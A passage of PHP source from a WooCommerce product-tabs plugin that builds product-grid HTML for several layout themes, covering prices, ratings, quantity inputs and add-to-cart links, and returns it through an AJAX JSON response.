                    if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                    $html .= '<li><a href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'"><i class="fa fa-link" aria-hidden="true"></i></a> </li>';
                    }else{
                    $html .= '<li><a href="' . $product->get_permalink() . '"><i class="fa fa-link" aria-hidden="true"></i></a> </li>';
                    }

                endif;

                $html .= '<li><div class="qc_quantity qc_qat_style_five qc_out_of_stock_container">';


                $html .= ' <a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>

                            </div></li>
                        </ul>
                    </div>
                </div>
            </div>';
            }

            $html .= '</li>';
        endwhile;
    } else if ($theme_id == 'theme-six') {
        while ($product_query->have_posts()) : $product_query->the_post();
            $product = wc_get_product(get_the_ID());
            $product_stock_status = $product->get_stock_status();
            $html .= '<div class="pro_list_04">
                                    <div class="slider">
                                        <div class="pro_item_list '.qcld_product_product_has_gallery( get_the_ID() ).'">';
                                        if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                                            $html .='<a  href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">';   
                                        }else{
                                            $html .='<a href="'. $product->get_permalink() .'">';  
                                        }
                                        $html.= $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail(get_the_ID()). '</a></div>';
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
       
            $average = $product->get_average_rating();


            if (get_option('display_rating') == 1):
                $html .= '<div class="qcld_woo_product_rating">';
                if ($average == 1) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
                } else if ($average == 0) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
                } else if ($average <= 2) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
                } else if ($average <= 3) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
                } else if ($average <= 4) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
                } else if ($average <= 5) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
                }
                $html .= '</div>';

            endif;
            $html .= '</div>';


            if ($product->is_on_sale()):
                $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
            endif;
            $html .= '<div class="meta">';


            if (get_option('product_title') == 1):
                
                if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                    $html .= '<h3 class="pro_title_04"><a style="font-size: ' . get_option('change_title_text_size') . 'px;color:' . get_option('product_title_text_color') . '" href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a></h3>';
                }else{ 
                    $html .= '<h3 class="pro_title_04"><a style="font-size: ' . get_option('change_title_text_size') . 'px;color:' . get_option('product_title_text_color') . '" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h3>';
                }
            endif;

            $html .= '<span style="color: ' . get_option('product_content_text_color') . ';font-size:' . get_option('product_content_text_size') . 'px;" class="pro_price_04">';
            if (get_option('display_price') == 1):
            $html .= $product->get_price_html();
            endif;

            if(get_option('qc_quick_view_on_off') != 'off'): 
            $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                    <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
            endif; 
            $html .= '</span>';                        
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }
            $html .= '</div>';
            if ($product_stock_status != 'outofstock') {
                $html .= '<ul class="pro_icon action action_button action_buy">';

                if (get_option('product_title') == 1):
                    if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                    $html .= '<li><a href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'"><i class="fa fa-link" aria-hidden="true"></i></a> </li>';
                    }else{
                    $html .= '<li><a href="' . $product->get_permalink() . '"><i class="fa fa-link" aria-hidden="true"></i></a> </li>';
                    }

                endif;

                $html .= '<div class="qc_quantity qc_qat_style_six">';
          

                if (get_option('add_quantity_select') == 1):
                    if ($product->get_type() != 'variable'):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                            $html .= '<input class="qc_minus" type="button" value="-">
                            <input type="text" class="qc_product_quantity" name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'"><input class="qc_plus" type="button" value="+">';

                        }else{

                            $html .= '<input class="qc_minus" type="button" value="-">
                            <input type="text" class="qc_product_quantity" name="qcld_quantity"
                                    value="1"><input class="qc_plus" type="button" value="+">';
                        }

                    endif;
                endif;

                if (get_option('add_cart_link') == 1):

                    if ($product->get_type() != 'variable'){
                        $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                        if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                            $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        else:
                        $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="woo_tab_s_p_add_to_cart"><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                        endif;

                    }else{

                        $html .= '<a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                    }


                endif;

                $html .= '</ul>';
            } else {
                $html .= '<ul class="pro_icon action action_button action_buy">';

                if (get_option('product_title') == 1):
                    $html .= '<li><a href="' . $product->get_permalink() . '"><i class="fa fa-link" aria-hidden="true"></i></a></li>';
                   
                endif;

                $html .= '<div class="qc_quantity qc_qat_style_six">';
           

                if (get_option('add_cart_link') == 1):

                    $html .= '<a class="woo_tab_s_p_add_to_carts" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="'.$product->get_permalink().'"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';

                endif;

                $html .= '</ul>';
            }

            $html .= '</div>';

                   
            $html .= '</div>';
        endwhile;
    } else if ($theme_id == 'theme-seven') {
        while ($product_query->have_posts()) : $product_query->the_post();
            $product = wc_get_product(get_the_ID());
            $product_stock_status = $product->get_stock_status();
            $html .= '<li class="'.qcld_product_product_has_gallery( get_the_ID() ).'"><div class="pro_list_12_box">
                    <div class="pro_list_12_img">' . $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail(get_the_ID()). '</div>';
            if ($product->is_on_sale()) {
                $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
            }

            if (get_option('product_title') == 1):

                if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                $html .= '<h2 class="pro_list_12_title"><a style="font-size: ' . get_option('change_title_text_size') . 'px;color:' . get_option('product_title_text_color') . '"  href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a></h2>';
                 }else{ 
                $html .= '<h2 class="pro_list_12_title"><a style="font-size: ' . get_option('change_title_text_size') . 'px;color:' . get_option('product_title_text_color') . '" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
                }

            endif;
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 
            $average = $product->get_average_rating();

            if (get_option('display_rating') == 1):
                $html .= '<div class="qcld_woo_product_rating">';
                if ($average == 1) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
                } else if ($average == 0) {

                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
                } else if ($average <= 2) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
                } else if ($average <= 3) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
                } else if ($average <= 4) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
                } else if ($average <= 5) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
                }
                $html .= '</div>';

            endif;
            
            $html .= '<div style="color: ' . get_option('product_content_text_color') . ';font-size:' . get_option('product_content_text_size') . 'px;" class="pro_list_12_price">';

            if (get_option('display_price') == 1):
                $html .= $product->get_price_html();
            endif;

                if(get_option('qc_quick_view_on_off') != 'off'): 
                $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                        <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
                endif; 
                $html .= '</div>';
            if ($product_stock_status != 'outofstock') {


                if ($product->is_on_sale()):
                    $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
                endif;
                $html .= '<div class="pro_list_12_box_icon"><ul>';

                if (get_option('product_title') == 1):
                    if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                    $html .= '<li><a href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'"><i class="fa fa-link" aria-hidden="true"></i></a> </li>';
                    }else{
                    $html .= '<li><a href="' . $product->get_permalink() . '"><i class="fa fa-link" aria-hidden="true"></i></a> </li>';
                    }

                endif;


                if (get_option('add_quantity_select') == 1):

                    if ($product->get_type() != 'variable'):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                            $html .= '<li><div class="qc_quantity qc_qat_style_seven">';    
                            $html .= '<input class="qc_minus" type="button" value="-">
                            <input type="text" class="qc_product_quantity" name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                            <input class="qc_plus" type="button" value="+"></div></li>';

                        }else{

                            $html .= '<li><div class="qc_quantity qc_qat_style_seven">';    
                            $html .= '<input class="qc_minus" type="button" value="-">
                            <input type="text" class="qc_product_quantity" name="qcld_quantity" value="1">
                            <input class="qc_plus" type="button" value="+"></div></li>';
                        }

                    endif;
                endif;

                if (get_option('add_cart_link') == 1):

                    if ($product->get_type() != 'variable'){

                        $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                        if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                            $html .= ' <li><a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a></li>';
                        else:
                        $html .= '<li><a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="woo_tab_s_p_add_to_cart"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a></li>';
                        endif;

                    }else{

                        $html .= '<li><a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a></li>';
                    }

                endif;

                $html .= '</ul></div>';

            } else {

                if ($product->is_on_sale()):
                    $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
                endif;
                $html .= '<div class="pro_list_12_box_icon"><ul>';

                if (get_option('product_title') == 1):
                    if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                    $html .= '<li><a href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'"><i class="fa fa-link" aria-hidden="true"></i></a> </li>';
                    }else{
                    $html .= '<li><a href="' . $product->get_permalink() . '"><i class="fa fa-link" aria-hidden="true"></i></a> </li>';
                    }

                endif;




                if (get_option('add_cart_link') == 1):

                $html .= '<li><div class="qc_variable_quantity">';
                    $html .= '<a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a>';
                $html .= '</div></li>';

                endif;

                $html .= '</ul>';
            }

                                           
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }
            $html .= '</div>';
        endwhile;
    } else if ($theme_id == 'theme-eight') {
        $add_to_cart_text = get_option('change_add_to_cart_button_text');
        while ($product_query->have_posts()) : $product_query->the_post();
            $product = wc_get_product(get_the_ID());
            $product_stock_status = $product->get_stock_status();
            $html .= '<li class="'.qcld_product_product_has_gallery( get_the_ID() ).'"> <div class="qc_tabs_10_style_box">
                            <div class="pro_img">' . $product->get_image('shop_catalog') . '</div>';

            if ($product->is_on_sale()):
                $html .= '<label class="qc_on_sale" for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
            endif;
                $html .= ' <div class="qc-tabs-style13-hover">
                            <div class="pro_img">' . $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail(get_the_ID()). '</div>';
            if ($product->is_on_sale()):
                $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
            endif;

            if (get_option('product_title') == 1):
                
                if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                
                    $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px; color: ' . get_option('product_title_text_color') . ';" href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a></h2>';
                }else{ 
                    $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px;color:' . get_option('product_title_text_color') . ';" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a></h2>';
                }
            endif;

            $html .= '<div style="font-size: ' . get_option('product_content_text_size') . 'px;color:' . get_option('product_content_text_color') . ' !important;" class="qc_price">';
            if (get_option('display_price') == 1):
                $html .= $product->get_price_html();

            endif;

                if(get_option('qc_quick_view_on_off') != 'off'): 
                $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                        <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
                endif; 

                $html .= '</div>';
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 

            if (get_option('display_rating') == 1):

                $html .= '<div class="qc_ratting">';
                $average = $product->get_average_rating();
                if ($average == 1) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
                } else if ($average == 0) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
                } else if ($average <= 2) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
                } else if ($average <= 3) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
                } else if ($average <= 4) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
                } else if ($average <= 5) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
                }
            endif;


            $html .= '<div class="qc_quantity qc_qat_style_eight">';
            if ($product_stock_status != 'outofstock') {
                    if ($product->get_type() != 'variable'):
                    if (get_option('add_quantity_select') == 1):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                            $html .= ' <input class="qc_minus" type="button" value="-">
                              <input type="text" class="qc_product_quantity" name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                              <input class="qc_plus" type="button" value="+">';

                        }else{

                            $html .= ' <input class="qc_minus" type="button" value="-">
                              <input type="text" class="qc_product_quantity" name="qcld_quantity" value="1">
                              <input class="qc_plus" type="button" value="+">';
                        }


                    endif;
                endif;

                if (get_option('add_cart_link') == 1):

                    if ($product->get_type() != 'variable'){
                        

                        $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                        if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                            $html .= ' <a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" >';
                            if (!empty($add_to_cart_text)) {
                                $html .= esc_html($add_to_cart_text, 'woo-tabbed-category' );
                            } else {
                                $html .= esc_html('Add To Cart', 'woo-tabbed-category' );
                            }
                            $html .= '</a>';
                        else:
                        $html .= '<a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="woo_tab_s_p_add_to_cart">';
                            if (!empty($add_to_cart_text)) {
                                $html .=  esc_html($add_to_cart_text, 'woo-tabbed-category' );
                            } else {
                                $html .= esc_html('Add To Cart', 'woo-tabbed-category' );
                            }
                            $html .= '</a>';
                        endif;

                    }else{

                        $html .= '<a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#">Product Details</a>';
                    }

                endif;
            } else {

                if (get_option('add_cart_link') == 1):

                    $html .= '<a class="product_out_of_stock" data-p-price="' . $product->get_price() . '" data-p-id="' . $product->get_id() . '" href="'.$product->get_permalink().'">';

                    $html .= 'Product Details</a>';
                endif;
            }
            $html .= '</div>';

                                           
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }
            $html .= '</div></li>';
        endwhile;
    } else if ($theme_id == 'theme-three') {
        while ($product_query->have_posts()) : $product_query->the_post();
            $product = wc_get_product(get_the_ID());
            $product_stock_status = $product->get_stock_status();
            $html .= '<li class="'.qcld_product_product_has_gallery( get_the_ID() ).'">';

            if ($product->is_on_sale()):
                $html .= '<label for="qc_on_sale"><img src="' . QC_WOO_TAB_IMAGE_URL . '/sale.png"></label>';
            endif;


            $html .= '<div class="wootabs_img">' . $product->get_image('shop_catalog') .qcld_product_second_product_thumbnail(get_the_ID()). '</div>';

            if ($product_stock_status != 'outofstock') {


                $html .= '<div class="qc_pro_details">';

                $html .= '<ul>';
                if (get_option('add_cart_link') == 1):

                    
                    if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                
                        $html .= '<li><a  href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'"><i class="fa fa-link" aria-hidden="true"></i></a></li>';
                    }else{ 
                       $html .= '<li><a href="' . $product->get_permalink() . '"><i class="fa fa-link" aria-hidden="true"></i></a></li>';
                    }

                endif;


            

                if (get_option('add_quantity_select') == 1):
                    if ($product->get_type() != 'variable'):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                    if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){
                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);

                        $min_qty  = $response_min_max['min'];
                        $max_qty  = $response_min_max['max'];
                        $step_qty = $response_min_max['step'];

                            $html .= '<li><div class="qc_quantity qc_qat_style_three">';
                            $html .= '<input class="qc_minus" type="button" value="-">
                            <input type="text" class="qc_product_quantity" name="qcld_quantity" value="'.($min_qty ? $min_qty : 1).'" step="'.($step_qty ? $step_qty : '').'" min="'.($min_qty ? $min_qty : '').'" max="'.($max_qty ? $max_qty : '').'">
                            <input class="qc_plus" type="button" value="+"></div></li>';

                        }else{

                            $html .= '<li><div class="qc_quantity qc_qat_style_three">';
                            $html .= '<input class="qc_minus" type="button" value="-">
                            <input type="text" class="qc_product_quantity" name="qcld_quantity" value="1">
                            <input class="qc_plus" type="button" value="+"></div></li>';
                        }


                    endif;
                endif;

                if (get_option('add_cart_link') == 1):
                    
                    if ($product->get_type() != 'variable'){

                        $qc_woo_tabbed_cart_summary = get_option('qc_woo_tabbed_cart_summary_position');
                        if(isset($qc_woo_tabbed_cart_summary) && $qc_woo_tabbed_cart_summary == 'wooinstantcart' ):

                        $qcld_woo_pro_minmax_enable_plugin = get_option( 'qcld_woo_pro_minmax_enable_plugin' );
                        if(function_exists('qcld_woo_pro_minmax_install') && isset($qcld_woo_pro_minmax_enable_plugin) && $qcld_woo_pro_minmax_enable_plugin  == 'yes'){

                        $response_min_max = qcld_woo_pro_minmax_tabbed_add_rules_text($product->get_id(),0);
                        $min_qty  = $response_min_max['min'];
                        }else{
                        $min_qty  = 1;
                        }
                            $html .= ' <li><a  href="#"  class="ajax_add_to_cart add_to_cart_button product_type_simple woo_tab_s_p_add_to_cart" data-quantity="'.($min_qty ? $min_qty : 1).'" data-product_id="' . $product->get_id() . '" p-id="' . $product->get_id() . '"p-price="' . $product->get_price() . '" ><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a></li>';
                        else:
                        $html .= '<li><a id="' . $product->get_id() . '" data-p-id="' . $product->get_id() . '" data-p-price="' . $product->get_price() . '" href="' . $product->add_to_cart_url() . '" class="woo_tab_s_p_add_to_cart"><i
                            class="fa fa-cart-arrow-down" aria-hidden="true"></i></a></li>';
                        endif;

                    }else{
                        $html .= '<li><a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a></li>';
                    }

                endif;


                $html .= '</ul>
             </div>';
            } else {
                $html .= '<div class="qc_pro_details">';

                $html .= '<ul>';

                if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){
                
                    $html .= '<li><a  href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'"><i class="fa fa-link" aria-hidden="true"></i></a></li>';
                }else{ 
                   $html .= '<li><a href="' . $product->get_permalink() . '"><i class="fa fa-link" aria-hidden="true"></i></a></li>';
                }


               


                if (get_option('add_cart_link') == 1):

                    $html .= '<li><a  class="woo_tab_product_details" product-id="'.$product->get_id().'" href="#"><i class="fa fa-cart-arrow-down" aria-hidden="true"></i></a></li>';

                endif;


                $html .= '</ul>
             </div>';
            }
            if (get_option('product_title')):
                 if(isset($link_title_to_modal) && ($link_title_to_modal == '1' || $link_title_to_modal == '01')){

                $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px;color:' . get_option('product_title_text_color') . ';" href="#" class="woo_tab_product_details" product-id="'.$product->get_id().'">' . $product->get_title() . '</a> </h2>';
                    }else{ 

                    $html .= '<h2><a style="font-size: ' . get_option('change_title_text_size') . 'px;color:' . get_option('product_title_text_color') . ';" href="' . $product->get_permalink() . '">' . $product->get_title() . '</a> </h2>';
                    }
            endif;
            if(get_option('qc_woo_tabbed_display_product_tag') == 'enable'){
            $html .= woo_tabbed_product_tags_by_id_ajax(get_the_ID());
            } 

            $average = $product->get_average_rating();

            if (get_option('display_rating') == 1):
                $html .= '<div class="qcld_woo_product_rating">';
                if ($average == 1) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/1_star.png" alt="">';
                } else if ($average == 0) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/no_star.png" alt="">';
                } else if ($average <= 2) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/2_star.png" alt="">';
                } else if ($average <= 3) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/3_star.png" alt="">';
                } else if ($average <= 4) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/4_star.png" alt="">';
                } else if ($average <= 5) {
                    $html .= '<img src="' . QC_WOO_TAB_IMAGE_URL . '/5_star.png" alt="">';
                }

                $html .= '</div>';
            endif;
            $html .= '<div class="woo_price" style="font-size:' . get_option('product_content_text_size') . 'px;color:' . get_option('product_content_text_color') . '">';


            if (get_option('display_price') == 1):
                $html .= $product->get_price_html();
            endif;

            if(get_option('qc_quick_view_on_off') != 'off'): 
            $html .= '<a href="#"  class="woo_tab_product_details" product-id="'.$product->get_id().'">
                    <i class="fa fa-info-circle" aria-hidden="true"></i></a>';
            endif; 

            $html .= '</div>';

                                           
            $qcld_woo_pro_minmax_dynamic_pricing_setting = get_option('qcld_woo_pro_minmax_dynamic_pricing_setting');

            if(function_exists('qcld_woo_pro_minmax_install') && (isset($qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off']) && $qcld_woo_pro_minmax_dynamic_pricing_setting['qcld_woo_pro_minmax_price_table_on_off'] == 'enable') ){

              $result_show = qcld_woo_pro_minmax_tabbed_dynamic_discount_price_table_show(get_the_ID());
              $html .= $result_show;
            }
            $html .= '</li>';
        endwhile;
    }
    wp_reset_query();
    $response = array(


        'show_per_page' => $show_per_page,
        'product_num' => $products_num,
        'html' => $html,
        'offset' => $nextOffset,
        'show_sale' => $show_sale
    );
    echo wp_send_json($response);
    wp_die();

}


add_action('wp_footer', 'woo_tab_load_footer_html');

function woo_tab_load_footer_html()
{
    ?>
    <style>
        <?php if(!empty(get_option('custom_global_css'))){ echo get_option('custom_global_css'); }?>

        <?php 

            if(!empty(get_option('qc_woo_tabbed_display_default_template_sidebar'))){

